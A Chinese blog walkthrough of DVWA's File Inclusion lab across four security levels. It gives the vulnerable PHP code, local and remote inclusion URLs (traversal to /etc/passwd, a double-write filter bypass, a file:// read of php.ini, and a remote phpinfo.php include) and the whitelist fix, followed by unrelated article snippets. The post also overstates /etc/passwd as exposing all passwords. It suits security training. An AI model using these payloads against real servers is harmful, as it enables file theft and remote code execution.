wen___lee
wen___lee

File Inclusion--文件包含漏洞

一、简介

为了提高代码的复用性,开发人员往往将业务功能封装成模块放入一个文件中,需要的时候包含对应的文件即可。如果包含者为对被包含的文件进行检查,那么很有可能造成灾难性的后果。
File Inclusion分为LFI(Local File Inclusion,本地文件包含)和RFI(Remote File Inclusion,远程文件包含),LFI指使用文件包含函数包含执行本地(Web应用所在主机)文件,利用LFI可以查看系统任意文件内容,如果具备一些条件,也可以执行命令;RFI需要一定的条件,以PHP应用来说,当且仅当php.ini的配置选项allow_url_fopen和allow_url_include为ON的话,则文件包含函数是可以加载远程文件的,利用RFI可以直接执行任意命令。

二、Low

1、服务器端代码


// The page we wish to display
$file = $_GET[ 'page' ];

?>

2、漏洞分析
可以看到,服务端是通过get方法获取参数,且并未对“page”参数做任何检查和处理,所以我们可以直接构造url,读取服务器上的文件或者包含远程文件。
3、漏洞利用

  • LFI
    构造url: “http://192.168.0.114/DVWA/vulnerabilities/fi/?page=…/…/…/…/…/…/etc/passwd”,输入至地址栏,可以读取到服务器端所有账户的密码,可见危害之大。
    File Inclusion--文件包含漏洞_第1张图片

  • RFI:
    在另外一个服务器(192.168.0.133)上传文件phpinfo.php,内容如下:
    File Inclusion--文件包含漏洞_第2张图片
    构建url “http://192.168.0.114/DVWA/vulnerabilities/fi/?page=http://192.168.0.133:82/phpinfo.php”,File Inclusion--文件包含漏洞_第3张图片

三、Medium

1、服务器端代码

// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );

?>

2、漏洞分析
Medium级别的代码使用“str_replace”函数将“page”参数中的“http://、https://、…/、…\”替换为空格,可以通过双写绕过
比如 “http://192.168.0.114/DVWA/vulnerabilities/fi/?page=…/./…/./…/./…/./…/./…/./etc/passwd”等效为
“http://192.168.0.114/DVWA/vulnerabilities/fi/?page=…/…/…/…/…/…/etc/passwd”
“http://192.168.0.114/DVWA/vulnerabilities/fi/?page=hthttp://tp://192.168.0.133:82/phpinfo.php”等效为
“http://192.168.0.114/DVWA/vulnerabilities/fi/?page=http://192.168.0.133:82/phpinfo.php”

3、漏洞利用

  • LFI:地址栏输入“http://192.168.0.114/DVWA/vulnerabilities/fi/?page=…/./…/./…/./…/./…/./…/./etc/passwd”
    File Inclusion--文件包含漏洞_第4张图片

  • RFI:地址栏输入“http://192.168.0.114/DVWA/vulnerabilities/fi/?page=hthttp://tp://192.168.0.133:82/phpinfo.php”
    File Inclusion--文件包含漏洞_第5张图片

四、High

1、服务器端代码


// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

2、漏洞分析
High级别的代码使用“fnmatch”函数对用户输入进行检测,要求必须是以“file”开头(此处不明白,点击file1.php时,page=file1.php,但是依然没有报错),可以使用file协议绕过
3、漏洞利用
构建url: “http://192.168.0.114/DVWA/vulnerabilities/fi/?page=file:///var/www/html/DVWA/php.ini”,输入至地址栏,成功读取到了服务器配置文件。
File Inclusion--文件包含漏洞_第6张图片

四、Impossible

1、服务器端代码


// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

2、漏洞分析
Impossible使用了白名单机制进行防护,page参数必须为“include.php”、“file1.php”、“file2.php”、“file3.php”之一,彻底杜绝了文件包含漏洞。

你可能感兴趣的:(File Inclusion--文件包含漏洞)

  • 一维数组练题习~ 遇见尚硅谷 初学者算法数据结构c语言开发语言排序算法
    1.键盘录入一组数列,利用冒泡排序将数据由大到小排序/*************************************************************************>FileName:demo01.c>Author:阮>Description:>CreatedTime:***********************************************
  • Node.js package.json常用配置字段(Node.js配置、Node项目配置、Node配置)(package-lock.json、yarn.lock) Dontla 前端nodejsnode.jsjson
    文章目录Node.jspackage.json配置字段详解引言基础元数据字段nameversiondescriptionkeywordsauthorlicense依赖管理dependenciesdevDependenciespeerDependenciesoptionalDependenciesoverrides脚本配置scripts发布配置privatepublishConfigfilesmai
  • python基础笔记 大大的大大 笔记python前端数据库
    输入就是print();#括号里面双引号(“xxxx”)=单引号('xxxx')必须在一行;但是三引号"""xxxx"""='''xxx'''可以换行输出;#'''xxxnnn'''xx=open(('C:\py\py笔记.txt','a+')print('hello',file=xx)xx.close()可以在python中新建文本文本档等(看后缀):"xx"=open('C:\py\py笔记.
  • 基于Docker构建Python后端项目落地总结
    Docker使用总结基于Dockerfile的镜像构建示例dockerfile解析#加载centos7的最小镜像源FROMcentos:7RUNyumcleanallRUNyum-yupdate#修改时区RUNln-sf/usr/share/zoneinfo/Asia/Shanghai/etc/localtime&&echo"Asia/Shanghai">/etc/timezone#安装中文支持R
  • 【SRC漏洞】第四章 业务逻辑(补充篇)
    提示:主要讲解场景思路提示:看不出来要拦截那个数据包,那么就一个一个数据包的进行尝试目录商城类漏洞支付漏洞商城类漏洞优惠劵并发:领取优惠劵时候,并发领取优惠卷的复用:并发下单,一个优惠劵多次使用切换优惠劵的id:某商品仅允许某优惠卷抓包修改1000的东西只能使用20块的优惠价,但是有一张50的优惠卷将20块的优惠卷id修改为50块的时间型优惠劵:修改个人信息如生日日期出生日期让优惠卷可以天天使用优
  • Java File 类详解:从基础操作到实战应用,掌握文件与目录处理全貌
    作为一名Java开发工程师,你一定在实际开发中遇到过需要操作文件或目录的场景,例如:读写配置文件、上传下载、日志处理、文件遍历、路径管理等。Java提供了java.io.File类来帮助开发者完成这些任务。本文将带你全面掌握:File类的核心方法与功能文件与目录的创建、删除、重命名、判断是否存在等操作文件属性获取(大小、修改时间、是否是目录/文件等)文件路径的处理(绝对路径、相对路径、父路径等)F
  • 软件工程学概述:从危机到系统化工程的演进之路 耐思nice~ 软件工程导论-张海藩软件工程
    在数字化时代,软件已渗透到生活的方方面面。可你是否遇到过这样的情况:一款期待已久的软件,上线后却频繁崩溃、漏洞百出,不仅影响使用体验,还可能造成巨大损失?这背后,或许就与“软件危机”有着千丝万缕的联系。今天,我们就一同走进软件工程的世界,探寻其发展脉络与核心知识。一、软件危机1.1软件危机的介绍软件危机是指在计算机软件的开发和维护过程中所遇到的一系列严重问题。这些问题主要表现在:软件开发成本和进度
  • vue json格式导出excel文件 家电修理师 vue.jsjsonexcel前端javascript
    1、下载xlsx、file-saver插件npminstallxlsxfile-saver2、页面中引入插件import*asXLSXfrom'xlsx';import{saveAs}from'file-saver';3、创建excel导出结构每一个数组表示一行constdata=[["姓名","性别","电话"],["张三","男","15888888888"],];4、将数据转换为工作表//d
  • filebeat改造支持rocketmq 余很多之很多 goJavarocketmq
    继续分享下以前在gitchat上发布的文章:filebeat改造支持rocketmq1.概述1.1问题概述现在越来越多的日志采集使用FileBeat,FileBeat是个轻量型日志采集器,采用Go语言实现,性能稳健,占用资源少。FileBeat现在支持采集的日志内容发送到Redis、Elasticsearch、Kafka、Logstash。那么我们如果想通过FileBeat采集日志到RocketM
  • numpy教程 Jeffrey_Pacino 编程学习numpy数据分析
    使用jupyternotebook分析数据之前导入的包importnumpyasnp#linearalgebraimportpandasaspd#dataprocessing,CSVfileI/O(e.g.pd.read_csv)​%matplotlibinlineimportmatplotlib.pyplotasplt#Matlab-styleplottingimportseabornassns
  • 2021,零日漏洞最疯狂的一年 GoUpSec
    2021年,零日漏洞的数量增长了一倍,价格增长了十倍,但攻击回报增长了百倍!零日漏洞利用,即通过以前未知的漏洞发起网络攻击的方式,是黑客手中最有价值的武器,因为这些漏洞在公开市场上的价格很轻松就能超过100万美元。近日,麻省理工科技评论走访了多个数据库、安全研究人员和网络安全公司,发现今年网络安全防御者的人数达到了有史以来的最高水平,但零日漏洞的数量也创下了新的记录。根据零日漏洞追踪项目的统计(下
  • 【Git】git lfs (Large File Storage)-管理大文件 晴雨日记 Gitgit
    GitLFS(LargeFileStorage)是Git的一个扩展,用于高效管理大文件(如图像、音频、视频、数据集、二进制文件等)。它能解决传统Git在处理大文件时面临的核心问题:仓库体积急剧膨胀、克隆和拉取操作变得极其缓慢。传统Git处理大文件的痛点:仓库膨胀:每次修改大文件,即使只改了一点,Git也会存储整个文件的新副本。历史记录中积累多个版本会快速耗尽磁盘空间。克隆/拉取缓慢:克隆或拉取仓库
  • Apache Kafka 学习笔记
    一、Kafka简介1.1Kafka是什么?Kafka是一个高吞吐、可扩展、分布式的消息发布-订阅系统,主要用于:日志收集与处理流式数据处理事件驱动架构实时分析管道最初由LinkedIn开发,后捐赠给Apache基金会。1.2Kafka的核心特性特性描述高吞吐每秒百万级消息处理能力,依赖顺序写磁盘、批量处理分布式支持水平扩展,多个Broker组成集群持久化消息写入磁盘(通过segmentfiles+
  • 如何在Linux挂载ISO镜像文件 longerxin2020 Linuxlinux运维服务器
    在Linux系统中挂载ISO镜像文件,主要步骤如下‌:‌创建挂载目录‌:创建一个用于挂载ISO镜像文件的目录,例如/mnt/iso。‌挂载ISO镜像文件‌:使用mount命令挂载ISO镜像文件到创建的目录。命令:sudomount-oloop/path/to/iso/file.iso/mnt/iso‌查看挂载状态‌:使用df命令查看挂载点,确认ISO镜像文件是否成功挂载。df-h‌卸载ISO镜像文
  • 大模型格式
    目录大模型格式:ollma可以加载ggufChatGPT说:什么是GGUF?大模型格式:Ollama模型格式只能运行已打包成.gguf格式的模型,或通过其Modelfile方式构建ModelScope模型格式大多使用HuggingFaceTransformers格式,如.bin、.safetensors,与Ollama不兼容模型加载方式不同Ollama自带封装推理引擎(ggml/llama.cpp
  • Python文件与流处理:高效读写数据的艺术 不爱说话的分院帽 python快速入门python数据库开发语言
    引言作为一名程序员,我们每天都需要与文件打交道——无论是读取配置文件、处理日志文件,还是存储程序生成的数据。Python提供了强大而灵活的文件处理能力,让这些操作变得简单高效。本文将深入探讨Python中的文件与流处理,帮助你掌握这一核心技能。、一、文件操作基础1.打开文件Python使用内置的open()函数来打开文件:#基本语法file=open('example.txt','r')#打开文件
  • 如何删除lazyvim AI大权 操作系统vim
    主要是删除这些文件:~/.config/nvim(LazyVimconfig)~/.local/share/nvim(用户数据目录下,这里有lazy安装的插件和mason安装的包)~/.local/state/nvim(Sessionstatedirectory:storageforfiledrafts,swap,undo,shada.)~/.cache/nvim(Neovimcache)rm-r
  • 解决报错:node:internal/errors:496 ErrorCaptureStackTrace(err); lvchaoq debugvue
    报错信息我使用npminitvue@latest创建项目时出现如下报错node:internal/errors:496ErrorCaptureStackTrace(err);^TypeError[ERR_IMPORT_ASSERTION_TYPE_MISSING]:Module“file:///D:/develop/nodejs/node_cache/_npx/2f7e7bff16d1c534/n
  • 远程连接FTP方案:在无公网IP网络中配置内网FTP服务的外网异地直接使用访问
    在普通家庭和公司网络中配置FTP服务器的远程访问,需要先在局域网内搭建FTP服务器,如选择FileZillaServer等软件进行安装和基础配置,设置用户账号、密码和访问权限等。然后进行端口映射,若无公网IP,可借助nat123等点到点内网穿透工具,注册登录后添加同端口直连映射,将内网FTP服务器端口映射到外网,实现远程同端口直接访问。一、应用场景FTP跨网访问需求为了方便在家办公的时候可以访问公
  • 深入理解Linux内核-进程 苦茶子12138 Linux上岸手册linux服务器运维
    1、进程的静态特性进程:程序执行时的一个实例进程描述符(task_struct):进程的基本信息(thread_info)、指向内存区描述符的指针(mm_struct)、进程相关的tty(tty_struct)、当前目录(fs_struct)、指向文件描述符的指针(files_struct)、所接收的信号(signal_struct)进程状态:1、可运行状态(TASK_RUNNING):正在运行或
  • fdata = fp.read()ValueError: read of closed file 什么意思 whale fall python进阶python
    这个错误提示ValueError:readofclosedfile意味着你尝试从一个已经关闭的文件对象中读取数据。在Python中,当你打开一个文件后,文件需要保持打开状态才能进行读取或者写入操作。如果你关闭了文件(例如使用file.close()或者文件对象自动关闭),再尝试读取就会触发这个错误。要避免这个错误,可以确保在文件关闭之前读取文件,或者使用with语句来自动管理文件的打开和关闭。例如
  • Zephyr_FileSystems LikeShadows zephyrfilesystemzephyrapiRTOS文件系统
    1.文件系统(FileSystems)ZephyrRTOS的虚拟文件系统开关允许应用程序在不同的挂载点(如:/fatfs和/nffs)挂载多个文件系统。挂载点数据结构包含实例化、挂载和操作文件系统所需的所有必要的信息。文件系统开关通过引入文件系统注册机制,将应用程序从直接访问一个文件系统指定的API或内部函数分离开。在Zephyr中,任何文件系统的实现或库可以通过一个文件系统注册API插入或拔出。
  • Python SSTI漏洞原理与基础利用以及Fenjing的使用教程 cba尼里托圣 python网络web安全
    文章目录一、Python类与对象模型基础二、魔术方法的作用与利用价值1.__class__魔术方法2.__bases__与__mro__魔术方法3.__subclasses__()魔术方法4.__init__魔术方法5.__globals__魔术方法三、魔术方法链的构建与利用1.漏洞验证2.获取类对象3.定位到object基类4.遍历object的子类5.定位危险类6.获取全局变量空间7.执行命令
  • 多表代替密码与维吉尼亚密码:古典密码学的“动态魔法” 算法第二深情 密码学密码学
    一、多表代替密码:从“固定规则”到“动态变化”的密码革命1.定义与核心思想多表代替密码(PolyalphabeticSubstitutionCipher)是古典密码学的巅峰之作,其核心思想是“用多个替换表轮换加密”,彻底打破单表代替密码(如凯撒密码)的频率分析漏洞。单表代替密码的弱点:单表密码(如凯撒密码)的替换规则固定,导致明文字母的频率特征在密文中保留(例如英语中E最常见)。攻击者只需统计字母
  • 掌握C#文件操作与XML处理:学习资料完整指南 竹石文化传播有限公司
    本文还有配套的精品资源,点击获取简介:C#是一种广泛应用于Windows和跨平台开发的编程语言,它在.NET框架中包含强大的文件和XML操作能力。本文深入探讨了C#中的文件读写技术,包括使用System.IO命名空间中的File类进行文本和二进制文件处理,FileStream类的流操作,以及XML文档的解析、创建和修改方法。同时,文章也介绍了文件操作的扩展功能和在进行文件操作时应考虑的异常处理。通
  • 小架构step系列18:工具 秋千码途 架构
    1概述在写代码的时候,有很多通用的、与业务无关逻辑,这些一般写成工具类方法。这些工具类方法慢慢地被积累起来,变成了开源包,可以直接使用开源包,而不是自己再花时间来重复造这些轮子。这些工具类的开源包比较多,公司如果没有控制的话,不同的开发人员就会选自己熟悉的开源包,甚至都拿来练练手。这样的后果就是,在一个工程内使用了五花八门的工具类包,维护代码的时候不好维护,如果要升级一些框架包或者扫描漏洞,发现很
  • 【web-攻击用户】(9.1.6)查找并利用XSS漏洞--基于DOM 黑色地带(崛起) 0X02【web渗透】web安全
    目录查找并利用基于DOM的XSS漏洞1.1、简介:1.2、过程:查找并利用基于DOM的XSS漏洞1.1、简介:1、提交一个特殊的字符串作为每个参数,然后监控响应中是否出现该字符串,无法确定基于DOM的XSS漏洞2、确定基于DOM的XSS漏洞的基本方法是,用浏览器手动浏览应用程序,并修改每一个URL参数,在其中插入一个标准测试字符串(如alert(1)和;alert(1)//等)3、通过在浏览器中显
  • rce漏洞测试
    目录什么是RCE?漏洞介绍漏洞分类远程命令执行29关30关31关32~36关37关38关39关40关41关42关43关44关45关46~49关总结什么是RCE?漏洞介绍RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE主要指远程代码执行和远程命令执行,CTFHub中将文件包含漏洞也看作RCE漏洞。漏洞分类远程命令执行远程代码执行文件包含漏洞实际上,RCE
  • xss的利用 m0_73832254 xss前端
    目录一、XSS的原理和分类二、常见的XSS标签和属性三、Xss漏洞分类1.反射性xss反射性XSS典型攻击场景基于URL参数的反射性XSS基于表单参数的反射性XSS利用HTML标签属性的反射性XSS2.存储型XSS存储型XSS的高频攻击场景社交平台评论区论坛发帖与私信系统电商平台商品描述3.基于DOM的XSS攻击原理剖析DOM型XSS典型攻击场景与案例基于URL参数的DOM型XSS基于localS
  • xss漏洞-反射+存储+DOM xiaoheizi安全 XSS漏洞合集web安全xss
    XSS跨站-反射型&存储型&DOM型等产生原理:服务器没有对用户提交的数据做过滤或者过滤不严谨,直接回显到了用户浏览器,浏览器对其进行了js解析并执行,导致了xss漏洞。攻击原理:攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,浏览器就会直接执行用户注入的脚本。利用:确认漏洞存在后可
  • java数字签名三种方式 知了ing javajdk
    以下3钟数字签名都是基于jdk7的 1,RSA String password="test"; // 1.初始化密钥 KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("RSA"); keyPairGenerator.initialize(51
  • Hibernate学习笔记 caoyong Hibernate
    1>、Hibernate是数据访问层框架,是一个ORM(Object Relation Mapping)框架,作者为:Gavin King 2>、搭建Hibernate的开发环境      a>、添加jar包:      aa>、hibernatte开发包中/lib/required/所
  • 设计模式之装饰器模式Decorator(结构型) 漂泊一剑客 Decorator
    1. 概述        若你从事过面向对象开发,实现给一个类或对象增加行为,使用继承机制,这是所有面向对象语言的一个基本特性。如果已经存在的一个类缺少某些方法,或者须要给方法添加更多的功能(魅力),你也许会仅仅继承这个类来产生一个新类—这建立在额外的代码上。      
  • 读取磁盘文件txt,并输入String 一炮送你回车库 String
    public static void main(String[] args) throws IOException {    String fileContent = readFileContent("d:/aaa.txt");    System.out.println(fileContent);   
  • js三级联动下拉框 3213213333332132 三级联动
    //三级联动 省/直辖市<select id="province"></select> 市/省直辖<select id="city"></select> 县/区 <select id="area"></select>
  • erlang之parse_transform编译选项的应用 616050468 parse_transform游戏服务器属性同步abstract_code
             最近使用erlang重构了游戏服务器的所有代码,之前看过C++/lua写的服务器引擎代码,引擎实现了玩家属性自动同步给前端和增量更新玩家数据到数据库的功能,这也是现在很多游戏服务器的优化方向,在引擎层面去解决数据同步和数据持久化,数据发生变化了业务层不需要关心怎么去同步给前端。由于游戏过程中玩家每个业务中玩家数据更改的量其实是很少
  • JAVA JSON的解析 darkranger java
    // { // “Total”:“条数”, // Code: 1, // // “PaymentItems”:[ // { // “PaymentItemID”:”支款单ID”, // “PaymentCode”:”支款单编号”, // “PaymentTime”:”支款日期”, // ”ContractNo”:”合同号”, //
  • POJ-1273-Drainage Ditches aijuans ACM_POJ
    POJ-1273-Drainage Ditches http://poj.org/problem?id=1273 基本的最大流,按LRJ的白书写的 #include<iostream> #include<cstring> #include<queue> using namespace std; #define INF 0x7fffffff int ma
  • 工作流Activiti5表的命名及含义 atongyeye 工作流Activiti
    activiti5 - http://activiti.org/designer/update在线插件安装 activiti5一共23张表 Activiti的表都以ACT_开头。 第二部分是表示表的用途的两个字母标识。 用途也和服务的API对应。 ACT_RE_*: 'RE'表示repository。 这个前缀的表包含了流程定义和流程静态资源 (图片,规则,等等)。 A
  • android的广播机制和广播的简单使用 百合不是茶 android广播机制广播的注册
          Android广播机制简介 在Android中,有一些操作完成以后,会发送广播,比如说发出一条短信,或打出一个电话,如果某个程序接收了这个广播,就会做相应的处理。这个广播跟我们传统意义中的电台广播有些相似之处。之所以叫做广播,就是因为它只负责“说”而不管你“听不听”,也就是不管你接收方如何处理。另外,广播可以被不只一个应用程序所接收,当然也可能不被任何应
  • Spring事务传播行为详解 bijian1013 javaspring事务传播行为
            在service类前加上@Transactional,声明这个service所有方法需要事务管理。每一个业务方法开始时都会打开一个事务。         Spring默认情况下会对运行期例外(RunTimeException)进行事务回滚。这
  • eidtplus operate 征客丶 eidtplus
    开启列模式: Alt+C 鼠标选择   OR   Alt+鼠标左键拖动 列模式替换或复制内容(多行): 右键-->格式-->填充所选内容-->选择相应操作 OR Ctrl+Shift+V(复制多行数据,必须行数一致) -------------------------------------------------------
  • 【Kafka一】Kafka入门 bit1129 kafka
    这篇文章来自Spark集成Kafka(http://bit1129.iteye.com/blog/2174765),这里把它单独取出来,作为Kafka的入门吧   下载Kafka http://mirror.bit.edu.cn/apache/kafka/0.8.1.1/kafka_2.10-0.8.1.1.tgz 2.10表示Scala的版本,而0.8.1.1表示Kafka
  • Spring 事务实现机制 BlueSkator spring代理事务
    Spring是以代理的方式实现对事务的管理。我们在Action中所使用的Service对象,其实是代理对象的实例,并不是我们所写的Service对象实例。既然是两个不同的对象,那为什么我们在Action中可以象使用Service对象一样的使用代理对象呢?为了说明问题,假设有个Service类叫AService,它的Spring事务代理类为AProxyService,AService实现了一个接口
  • bootstrap源码学习与示例:bootstrap-dropdown(转帖) BreakingBad bootstrapdropdown
    bootstrap-dropdown组件是个烂东西,我读后的整体感觉。 一个下拉开菜单的设计: <ul class="nav pull-right"> <li id="fat-menu" class="dropdown">
  • 读《研磨设计模式》-代码笔记-中介者模式-Mediator bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ /* * 中介者模式(Mediator):用一个中介对象来封装一系列的对象交互。 * 中介者使各对象不需要显式地相互引用,从而使其耦合松散,而且可以独立地改变它们之间的交互。 * * 在我看来,Mediator模式是把多个对象(
  • 常用代码记录 chenjunt3 UIExcelJ#
      1、单据设置某行或某字段不能修改 //i是行号,"cash"是字段名称 getBillCardPanelWrapper().getBillCardPanel().getBillModel().setCellEditable(i, "cash", false); //取得单据表体所有项用以上语句做循环就能设置整行了 getBillC
  • 搜索引擎与工作流引擎 comsci 算法工作搜索引擎网络应用
          最近在公司做和搜索有关的工作,(只是简单的应用开源工具集成到自己的产品中)工作流系统的进一步设计暂时放在一边了,偶然看到谷歌的研究员吴军写的数学之美系列中的搜索引擎与图论这篇文章中的介绍,我发现这样一个关系(仅仅是猜想)   -----搜索引擎和流程引擎的基础--都是图论,至少像在我在JWFD中引擎算法中用到的是自定义的广度优先
  • oracle Health Monitor daizj oracleHealth Monitor
    About Health Monitor Beginning with Release 11g, Oracle Database includes a framework called Health Monitor for running diagnostic checks on the database. About Health Monitor Checks Health M
  • JSON字符串转换为对象 dieslrae javajson
        作为前言,首先是要吐槽一下公司的脑残编译部署方式,web和core分开部署本来没什么问题,但是这丫居然不把json的包作为基础包而作为web的包,导致了core端不能使用,而且我们的core是可以当web来用的(不要在意这些细节),所以在core中处理json串就是个问题.没办法,跟编译那帮人也扯不清楚,只有自己写json的解析了.   
  • C语言学习八结构体,综合应用,学生管理系统 dcj3sjt126com C语言
    实现功能的代码: # include <stdio.h> # include <malloc.h> struct Student { int age; float score; char name[100]; }; int main(void) { int len; struct Student * pArr; int i,
  • vagrant学习笔记 dcj3sjt126com vagrant
    想了解多主机是如何定义和使用的, 所以又学习了一遍vagrant   1. vagrant virtualbox 下载安装 https://www.vagrantup.com/downloads.html https://www.virtualbox.org/wiki/Downloads   查看安装在命令行输入vagrant     2.
  • 14.性能优化-优化-软件配置优化 frank1234 软件配置性能优化
    1.Tomcat线程池 修改tomcat的server.xml文件: <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" maxThreads="1200" m
  • 一个不错的shell 脚本教程 入门级 HarborChung linuxshell
    一个不错的shell 脚本教程 入门级 建立一个脚本   Linux中有好多中不同的shell,但是通常我们使用bash (bourne again shell) 进行shell编程,因为bash是免费的并且很容易使用。所以在本文中笔者所提供的脚本都是使用bash(但是在大多数情况下,这些脚本同样可以在 bash的大姐,bourne shell中运行)。   如同其他语言一样
  • Spring4新特性——核心容器的其他改进 jinnianshilongnian spring动态代理spring4依赖注入
    Spring4新特性——泛型限定式依赖注入 Spring4新特性——核心容器的其他改进 Spring4新特性——Web开发的增强 Spring4新特性——集成Bean Validation 1.1(JSR-349)到SpringMVC  Spring4新特性——Groovy Bean定义DSL Spring4新特性——更好的Java泛型操作API  Spring4新
  • Linux设置tomcat开机启动 liuxingguome tomcatlinux开机自启动
    执行命令sudo gedit /etc/init.d/tomcat6 然后把以下英文部分复制过去。(注意第一句#!/bin/sh如果不写,就不是一个shell文件。然后将对应的jdk和tomcat换成你自己的目录就行了。 #!/bin/bash # # /etc/rc.d/init.d/tomcat # init script for tomcat precesses
  • 第13章 Ajax进阶(下) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Troubleshooting Crystal Reports off BW blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Troubleshooting+Crystal+Reports+off+BW#TroubleshootingCrystalReportsoffBW-TracingBOE   Quite useful, especially this part: SAP BW connectivity For t
  • Java开发熟手该当心的11个错误 tomcat_oracle javajvm多线程单元测试
    #1、不在属性文件或XML文件中外化配置属性。比如,没有把批处理使用的线程数设置成可在属性文件中配置。你的批处理程序无论在DEV环境中,还是UAT(用户验收 测试)环境中,都可以顺畅无阻地运行,但是一旦部署在PROD 上,把它作为多线程程序处理更大的数据集时,就会抛出IOException,原因可能是JDBC驱动版本不同,也可能是#2中讨论的问题。如果线程数目 可以在属性文件中配置,那么使它成为
  • 正则表达式大全 yang852220741 html编程正则表达式
    今天向大家分享正则表达式大全,它可以大提高你的工作效率 正则表达式也可以被当作是一门语言,当你学习一门新的编程语言的时候,他们是一个小的子语言。初看时觉得它没有任何的意义,但是很多时候,你不得不阅读一些教程,或文章来理解这些简单的描述模式。 一、校验数字的表达式 数字:^[0-9]*$ n位的数字:^\d{n}$ 至少n位的数字:^\d{n,}$ m-n位的数字:^\d{m,n}$
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他